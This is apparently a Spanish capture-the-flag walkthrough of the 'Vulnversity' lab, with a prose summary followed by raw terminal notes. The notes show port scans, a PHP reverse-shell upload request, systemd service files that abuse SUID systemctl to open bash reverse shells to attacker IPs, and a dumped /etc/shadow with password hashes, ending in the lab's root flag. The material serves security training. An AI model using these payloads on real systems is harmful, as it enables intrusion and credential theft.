๐งโ๐VULNVERSIDAD
Vulnversidad Writeup
Tarea 1 (Implementaciรณn)
Implementamos la mquina.
Tarea 2 (Reconocimiento)
Para realizar el reconocimiento, utilicรฉ la herramienta Nmap con el siguiente comando: nmap -A -sV -p- -T4 <direcciรณn IP de la mรกquina>. Este comando realiza un escaneo de todos los puertos y proporciona informaciรณn detallada sobre los servicios en ejecuciรณn.
En los resultados del escaneo, observรฉ que la mรกquina tiene varios servicios activos, incluyendo FTP, SSH, Samba, Squid proxy, y Apache en el puerto 3333. Tambiรฉn obtuve informaciรณn sobre el sistema operativo y versiones de software.
Tarea 3 (GoBuster)
La tarea siguiente consiste en utilizar GoBuster para descubrir directorios en el servidor web. Ejecutรฉ el comando gobuster dir -u http://<direcciรณn IP>:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt para buscar posibles directorios.
Los resultados revelaron varios directorios, y uno de interรฉs era "/internal". Este directorio contenรญa un formulario que permitรญa cargar archivos.
Tarea 4 (Servidor Web Comprometido)
Con la informaciรณn del directorio "/internal", la tarea era comprometer el servidor web. Creรฉ un archivo PHP inverso, lo renombrรฉ a "payload.phtml" y lo carguรฉ en el servidor. Iniciรฉ un oyente Netcat y, al visitar el enlace proporcionado, obtuve acceso al sistema.
Explorรฉ el sistema de archivos y encontrรฉ la bandera de usuario en el directorio del usuario del servidor web.
Tarea 5 (Escalada de Privilegios)
Al revisar los archivos SUID, encontrรฉ que "/bin/systemctl" tenรญa el bit SUID activado. Utilizando informaciรณn de GTFOBins, realicรฉ una escalada de privilegios ejecutando comandos a travรฉs de systemctl. Creรฉ un servicio temporal, lo vinculรฉ y habilitรฉ, lo que me permitiรณ obtener acceso root.
Resumen:
Implementรฉ la mรกquina y realicรฉ un escaneo con Nmap para obtener informaciรณn sobre servicios.
Utilicรฉ GoBuster para descubrir directorios en el servidor web.
Comprometรญ el servidor web cargando un archivo PHP inverso en el directorio "/internal".
Escalรฉ privilegios aprovechando el bit SUID en "/bin/systemctl" mediante GTFOBins.
Obtuve la bandera de usuario y la bandera root.
ยกEsta tarea proporcionรณ una prรกctica valiosa en reconocimiento, explotaciรณn de servicios web y escalada de privilegios!
// Some code pentestinOfensivoVULNVERSIDAD.txt
PENTESTING OFENCIVO
VULNVERSITY:
RECONOCIMIENTO:
โโโ(rootใฟkali)-[~]
โโ# nmap -sV 10.10.200.190
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-13 20:42 UTC
Nmap scan report for ip-10-10-200-190.eu-west-1.compute.internal (10.10.200.190)
Host is up (0.0075s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 02:F5:17:08:BC:07 (Unknown)
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.39 seconds
โโโ(rootใฟkali)-[~]
โโ# searchsploit ftp vsftpd
-------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------- ---------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Cons | linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Serv | windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Serv | windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service | linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
vsftpd 3.0.3 - Remote Denial of Service | multiple/remote/49719.py
-------------------------------------------------------- ---------------------------------
Shellcodes: No Results
โโโ(rootใฟkali)-[~]
โโ# searchsploit -m multiple/remote/49719.py
Exploit: vsftpd 3.0.3 - Remote Denial of Service
URL: https://www.exploit-db.com/exploits/49719
Path: /usr/share/exploitdb/exploits/multiple/remote/49719.py
File Type: Python script, ASCII text executable
Copied to: /root/49719.py
โโโ(rootใฟkali)-[~]
โโ# searchsploit Squid http
-------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------- ---------------------------------
Squid - 'httpMakeVaryMark()' Remote Denial of Service | linux/dos/38365.txt
Squid < 3.1 5 - HTTP Version Number Parsing Denial of S | multiple/dos/8021.pl
-------------------------------------------------------- ---------------------------------
Shellcodes: No Results
/////////////////////////////////////
vemos los recursoso compartidos por SMB :
โโโ(rootใฟkali)-[~]
โโ# smbclient -L //10.10.200.190 -U guest
Password for [WORKGROUP\guest]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (vulnuniversity server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP VULNUNIVERSITY
POST /internal/index.php HTTP/1.1
Host: 10.10.200.190:3333
Content-Length: 3387
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.200.190:3333
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBsRFqB8h7iwsROLb
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.200.190:3333/internal/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9
Connection: close
------WebKitFormBoundaryBsRFqB8h7iwsROLb
Content-Disposition: form-data; name="file"; filename="0f93aยงextensionยง"
Content-Type: image/png
ยPNG
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c '/bin/sh -i >& /dev/tcp/10.10.230.35/443 0>&1'
[Install]
WantedBy=multi-user.target' > $TF
sudo systemctl link $TF
sudo systemctl enable --now $TF
[Unit]
Description=roooooooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.230.35/9999 0>&1'
[Install]
WantedBy=multi-user.target
[Install]
WantedBy=multi-user.target > $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/rootshell.service to /tmp/rootshell.service
//////////////////////
FUNCIONA SE EJECUTAN LOS COMANDOS COMO ROOT PERO NO TENEMOS LA SHELL
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /etc/shadow > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
sudo systemctl link $TF
sudo systemctl enable --now $TF
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "find / -type f -name flag.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
sudo systemctl link $TF
sudo systemctl enable --now $TF
โโโ(rootใฟkali)-[~]
โโ# stty raw -echo; fg
[1] + continued nc -lnvp 9999
www-data@vulnuniversity:/$ ls
bin etc lib media proc sbin sys var
boot home lib64 mnt root snap tmp vmlinuz
dev initrd.img lost+found opt run srv usr
www-data@vulnuniversity:/$ ls /tmp
systemd-private-bdeefd24b3db404dbd455703dfaffa8a-systemd-timesyncd.service-zaUH8g
www-data@vulnuniversity:/$ ls /root
ls: cannot open directory '/root': Permission denied
www-data@vulnuniversity:/$ TF=$(mktemp).service
www-data@vulnuniversity:/$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "cat /etc/shadow > /tmp/output"
> [Install]
> WantedBy=multi-user.target' > $TF
www-data@vulnuniversity:/$ ls /tmp
systemd-private-bdeefd24b3db404dbd455703dfaffa8a-systemd-timesyncd.service-zaUH8g
tmp.emRl5R2fIU
tmp.emRl5R2fIU.service
www-data@vulnuniversity:/$ systemctl link $TF
Created symlink from /etc/systemd/system/tmp.emRl5R2fIU.service to /tmp/tmp.emRl5R2fIU.service.
www-data@vulnuniversity:/$ ls /tmp
systemd-private-bdeefd24b3db404dbd455703dfaffa8a-systemd-timesyncd.service-zaUH8g
tmp.emRl5R2fIU
tmp.emRl5R2fIU.service
www-data@vulnuniversity:/$ systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.emRl5R2fIU.service to /tmp/tmp.emRl5R2fIU.service.
www-data@vulnuniversity:/$ ls /tmp
output
systemd-private-bdeefd24b3db404dbd455703dfaffa8a-systemd-timesyncd.service-zaUH8g
tmp.emRl5R2fIU
tmp.emRl5R2fIU.service
www-data@vulnuniversity:/$ cat /tmp/output
root:$6$VbvnbWCV$F7SSCrKm6JJdUsdcWK3hx47ARJdWvkFuW.JVRfUHSj/od3J34WkMKDJws0558oP0l8Ux2.ZDlpg6KSe5SCoYI0:18109:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
lxd:*:18108:0:99999:7:::
messagebus:*:18108:0:99999:7:::
uuidd:*:18108:0:99999:7:::
dnsmasq:*:18108:0:99999:7:::
sshd:*:18108:0:99999:7:::
ftp:*:18109:0:99999:7:::
bill:$6$0Ab1ttYa$PjLYB5poGT2Hz/pwXwpIKEi3ptJ.UZAqqYGmcCGuzCtnJX9u1aYnkd/6NSH4HS4vbtQUp/pwSXXu.XCsuHHlD/:18109:0:99999:7:::
//////////////////////
PROBAMOS LA GUIA DE GITHUB para conseguir la shell como ROOT:
VICTIMA:
www-data@vulnuniversity:/tmp$ cat root.service
[Unit]
Description=roooooooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.190.200/9998 0>&1'
[Install]
WantedBy=multi-user.target
www-data@vulnuniversity:/tmp$ /bin/systemctl enable /tmp/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /tmp/root.service.
Created symlink from /etc/systemd/system/root.service to /tmp/root.service.
www-data@vulnuniversity:/tmp$ /bin/systemctl start root.service
ATACANTE:
โโโ(rootใฟkali)-[~]
โโ# nc -lnvp 9998
listening on [any] 9998 ...
connect to [10.10.190.200] from (UNKNOWN) [10.10.108.57] 56478
bash: cannot set terminal process group (2013): Inappropriate ioctl for device
bash: no job control in this shell
root@vulnuniversity:/# whoami
whoami
root
root@vulnuniversity:/# find / -type f -name flag.txt 2>/dev/null
find / -type f -name flag.txt 2>/dev/null
root@vulnuniversity:/# ls
ls
bin
boot
dev
etc
home
initrd.img
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
root@vulnuniversity:/# cd root
cd root
root@vulnuniversity:~# ls
ls
root.txt
root@vulnuniversity:~# cat root.txt
cat root.txt
a58ff8579f0a9270368d33a9966c7fd5
Last updated